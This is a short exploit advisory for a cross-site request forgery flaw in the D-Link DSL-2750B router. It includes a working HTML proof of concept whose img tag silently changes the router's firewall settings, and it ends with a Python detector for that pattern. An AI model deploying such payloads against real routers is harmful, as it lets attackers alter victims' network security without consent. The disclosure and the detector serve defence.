D-Link DSL-2750B ADSL Router – Cross-Site Request Forgery

  • Author: killall-9
    Date: 2014-02-11
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/31569/
  • # Exploit Title : D-Link DSL-2750B (ADSL Router) CSRF Vulnerability
    # Date : 10-02-2014
    # Author : killall-9@mail.com
    # Vendor site : http://www.d-link.com
    # Version : DSL-2750B 
    # Tested on : Firmware Version: EU_2.02; Hardware Version: B1
    
    The D-Link DSL-2750B's web interface (listening on TCP port 80) is prone to CSRF vulnerabilities, which allow router parameters to be changed.
    
    POC=>
    
    <html lang="en">
    <head>
    <title>Pinata-CSRF-poc for D-Link</title>
    </head>
    <body>
    <img src="http://192.168.1.1/scdmz.cmd?&fwFlag=50853375&dosenbl=1" />
    </body>
    </html>
    
    cincin°°°
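
A defensive check for the pattern the PoC above relies on, as an added example that is not part of the original advisory: it scans HTML (for instance, content passing a mail or web gateway) for auto-loaded elements whose URL targets a private or loopback IP literal and carries query parameters. The class and function names and the sample input are assumptions made for illustration.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qsl

# (tag, attribute) pairs that make a browser issue a GET with no user action.
AUTO_FETCH = {("img", "src"), ("iframe", "src"), ("script", "src"),
              ("link", "href"), ("embed", "src"), ("object", "data")}


class PrivateFetchFinder(HTMLParser):
    """Collect auto-loaded URLs aimed at private/loopback IPs with parameters."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if (tag, name) not in AUTO_FETCH or not value:
                continue
            try:
                parts = urlsplit(value)
                ip = ipaddress.ip_address(parts.hostname or "")
            except ValueError:
                continue  # malformed URL or host is not an IP literal
            params = dict(parse_qsl(parts.query, keep_blank_values=True))
            # A parameterised GET to an internal address is the CSRF signal.
            if (ip.is_private or ip.is_loopback) and params:
                self.findings.append({"tag": tag, "host": str(ip),
                                      "path": parts.path, "params": params})


def find_private_fetches(html_text):
    """Return one finding per suspicious auto-loaded URL in html_text."""
    finder = PrivateFetchFinder()
    finder.feed(html_text)
    return finder.findings


# Constructed sample: the advisory's PoC <img> next to a benign public image.
SAMPLE = """<html><body>
<img src="http://192.168.1.1/scdmz.cmd?&fwFlag=50853375&dosenbl=1" />
<img src="https://example.com/logo.png?v=2" />
</body></html>"""

if __name__ == "__main__":
    for finding in find_private_fetches(SAMPLE):
        print(finding)
```

Hostnames that resolve to internal addresses are not covered; this check only handles IP literals such as the one in the PoC.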